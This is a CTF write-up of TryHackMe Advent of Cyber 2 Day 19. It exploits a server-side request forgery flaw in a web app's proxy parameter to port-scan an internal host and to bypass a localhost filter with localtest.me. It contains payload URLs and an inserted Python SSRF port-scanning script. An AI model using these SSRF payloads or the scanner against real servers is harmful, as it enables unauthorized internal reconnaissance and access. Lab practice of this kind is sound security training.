TryHackMe — Advent of Cyber 2 - Day 19

Trent Darrow
4 min read · Dec 20, 2020

Good evening everyone,

Today we will be tackling the Day 19 machine, which is based on LFI and SSRF. Anyway, the intro for today:

“Santa has released a web app that lets the children of the world check whether they are currently on the naughty or nice list. Unfortunately, the elf who coded it exposed more things than she thought. Can you access the list administration and ensure that every child gets a present from Santa this year?

Feel free to try hacking this web app on your own, or follow the instructions below! Note: when bypassing the hostname filter, use localtest.me otherwise your attempts won’t work!”

Now, I won't kid you, I did read through the notes for today to get an idea of what we are dealing with. They tell us there is an HTTP server on the machine, so for now I'll skip nmap and dive right into that.

Alrighty, so our first question: What is Santa's password?

Upon entry into the website, we encounter this form, along with an admin login below it.

The interesting bit is the URL: http://10.10.69.159/?proxy=http%3A%2F%2Flist.hohoho%3A8080%2Fsearch.php%3Fname%3D3lduderino … also, I'm not on the nice list, which is sad. A quick scan through the page source didn't turn up anything of interest.

A quick URL decode in Burp gives: http://10.10.69.159/?proxy=http://list.hohoho:8080/search.php?name=3lduderino

We can strip everything after the port number to see whether there is a root page, and build a small script to brute-force other directories; we already know what a miss looks like (in this case, the root page).

But for now, let's move on and see if there is another route we can use.

So it looks like the front end is proxying our request to an internal server, list.hohoho, on port 8080. Since we control that URL, we can change the port number and see what comes back, which gives us rudimentary port scanning through the SSRF.

Right away we get a hit: port 22 is open on the internal server.
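To make the port-scanning step concrete, here is an added Python script that is not part of the original write-up or the challenge. It builds the ?proxy= URL exactly as the front end expects it, fetches it, and classifies each port from the proxied response. The front-end address and internal hostname are the ones quoted above; the error strings used to tell open, closed and non-HTTP ports apart are assumptions (the post only mentions "connection reset by peer"), and the sample responses at the bottom are constructed so the script runs offline.

```python
"""Rudimentary port scanning through the ?proxy= SSRF parameter.

Added example, not code from the original write-up or the challenge. The front-end
address and the internal hostname come from the post; the response markers used
to classify ports are ASSUMPTIONS (the post only quotes "connection reset by peer"),
so adjust them to whatever the proxy really returns. The sample responses at the
bottom are constructed so the script runs offline.
"""
from typing import Callable, Dict, Iterable
from urllib.parse import parse_qs, quote, urlparse
import urllib.error
import urllib.request

TARGET = "http://10.10.69.159/"   # vulnerable front end (from the post)
INTERNAL_HOST = "list.hohoho"      # internal host seen in the proxied URL (from the post)

# ASSUMED markers: what the proxy echoes when the back-end connection fails.
CLOSED_MARKERS = ("Connection refused",)
NON_HTTP_MARKERS = ("Connection reset by peer", "Empty reply from server")


def build_proxy_url(host: str, port: int, path: str = "/") -> str:
    """Wrap http://host:port/path in the front end's ?proxy= parameter, fully URL-encoded."""
    inner = f"http://{host}:{port}{path}"
    return f"{TARGET}?proxy={quote(inner, safe='')}"


def classify(body: str) -> str:
    """Turn the proxied response body into a coarse port state."""
    if any(marker in body for marker in CLOSED_MARKERS):
        return "closed"
    if any(marker in body for marker in NON_HTTP_MARKERS):
        return "open (non-HTTP)"   # something answered, but not with HTTP (e.g. SSH)
    return "open (HTTP)"


def http_fetch(url: str, timeout: float = 5.0) -> str:
    """Live fetcher: GET the front-end URL and return the body, even on HTTP error codes."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode(errors="replace")
    except urllib.error.HTTPError as err:
        return err.read().decode(errors="replace")


def scan(host: str, ports: Iterable[int],
         fetch: Callable[[str], str] = http_fetch) -> Dict[int, str]:
    """Probe each port via the proxy. `fetch` is injectable so the logic can be tested offline."""
    return {port: classify(fetch(build_proxy_url(host, port))) for port in ports}


# Constructed stand-in for the real server (not captured output).
FAKE_RESPONSES = {
    22: "Error: Connection reset by peer",
    80: "<html><title>Naughty or Nice list administration</title></html>",
    8080: "<html><p>search results</p></html>",
    3306: "Error: Connection refused",
}


def fake_fetch(url: str) -> str:
    """Offline fetcher: pull the port back out of the ?proxy= value and look it up."""
    inner = parse_qs(urlparse(url).query)["proxy"][0]
    return FAKE_RESPONSES.get(urlparse(inner).port, "Error: Connection refused")


if __name__ == "__main__":
    # Swap fake_fetch for http_fetch (the default) to run against the real box.
    for port, state in sorted(scan(INTERNAL_HOST, FAKE_RESPONSES, fetch=fake_fetch).items()):
        print(f"{port:5d}  {state}")
```

The point of keeping the fetcher injectable is that you can confirm the classification logic against responses you have captured before pointing the scanner at the box; on a real run, expand the port list and watch for the different error text the proxy gives for refused versus reset connections.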

I tried to grab the passwd file, but it seems they are filtering the URL.

If we try to check for a server that only listens on localhost, we get blocked (by their security team).

http://10.10.69.159/?proxy=http%3A%2F%2Flocalhost

Let's go back to the port trick and see if there are services that only listen on localhost. The note in the intro tells us to use localtest.me: every name under localtest.me is a public wildcard DNS record that resolves to 127.0.0.1, so list.hohoho.localtest.me still looks like the allowed hostname to the filter while actually pointing the proxy at the loopback interface.

http://10.10.69.159/?proxy=http%3A%2F%2Flist.hohoho.localtest.me:22

We get the same connection reset by peer error as above, which is good: the request reached port 22 via loopback, so the bypass works and we can now look for ports that are only reachable from localhost. Port 80 gives a hit with some goodies, which answers Question 1.

http://10.10.69.159/?proxy=http%3A%2F%2Flist.hohoho.localtest.me:80

Be aware that the username is case-sensitive.

Once you delete the naughty list (or read the source code), you will receive the flag for today's challenge. As usual, I'll leave that part up to you. That was a lot of googling for me today; hopefully yours went a little smoother.

As always, best of luck. If you enjoy my content, feel free to add me on LinkedIn and let me know you saw the blog.

Until next time,

-3lduderino
